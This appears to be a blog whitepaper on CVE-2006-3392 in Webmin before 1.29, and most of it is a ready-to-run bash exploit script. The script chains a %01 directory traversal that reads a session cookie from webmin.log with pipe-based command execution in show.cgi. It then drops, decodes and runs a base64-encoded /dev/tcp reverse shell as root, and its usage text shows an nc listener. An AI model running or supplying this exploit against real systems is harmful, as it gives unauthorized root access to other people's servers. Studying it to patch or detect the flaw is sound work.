Posts CVE-2006-3392 Whitepaper
Post
Cancel

CVE-2006-3392 Whitepaper

Background

Webmin contains two critical vulnerabilities within the perl codebase. The first, a directory transversal where you can read arbitrary files, including webmin’s logs. The second vulnerability consists of an authenticated only open read perl exec code exececution bug as root. To wrap it all together we can are able to read Webmin’s log file, which contains a cookie, (I personally thought this part was clever), to go from an unauthenticated webmin, to session hijack the last used login to webmin, thus using this as leverage to attack the /file/show.cgi application and run arbitrary code as root.

PoC

First we simply grab the session cookie out of webmin’s logfile with the directory transversal ex:

/var/webmin/webmin.log

Note: You’ll need to use hex character %01 to subvert the directory transversal filtering. ex:

..%01/..%01/

Next we’ll use the hijacked session to open read on show.cgi with the | character. This is a nuance of how when opening a file for reading in perl, you can use the pipe to receive the return of a command instead of an opened file.

Exploitation

#   __ _  _  __   ___  __  ____ ____
#  /  ( \/ )/ _\ / __)/ _\/ ___(_  _)
# (  O )  (/    ( (_ /    \___ \ )(
#  \__(_/\_\_/\_/\___\_/\_(____/(__)
#


HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
  then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"
echo "  nc -l -p 7777"
echo "  $0 10.0.0.4 10000 10.0.0.3 7777"
else
CMD=`echo "bash -p -i >& /dev/tcp/$LHOST/$LPORT 0>&1" | base64`
echo $CMD;
CMD0="echo $CMD > /tmp/b64s"
CMD1='base64 -d /tmp/b64s > /tmp/she11';
CMD2='chmod a+x /tmp/she11';
CMD3='/bin/bash /tmp/she11';
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Server: $HOST:$PORT";
echo "Getting cookie from webmin log...";
SID=`curl $HOST:$PORT/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/var/webmin/webmin.log -s | tail -n 1 | cut -f 5 -d ' ' | tr -d '\n'`;
echo "Setting cookie to: sid=$SID";
echo "Copying base64 encoded shell..."
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD0|" -s -L
sleep 1
echo "Debase64ing shell...";
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF1|$CMD1|" -s -L
sleep 1
echo "Chmodding shell...";
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF2|$CMD2|" -s -L
sleep 1
echo "Trying to spawn...";
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF3|$CMD3|" -s -L
fi

Good game guys, thanks for playing!

This post is licensed under CC BY 4.0 by the author.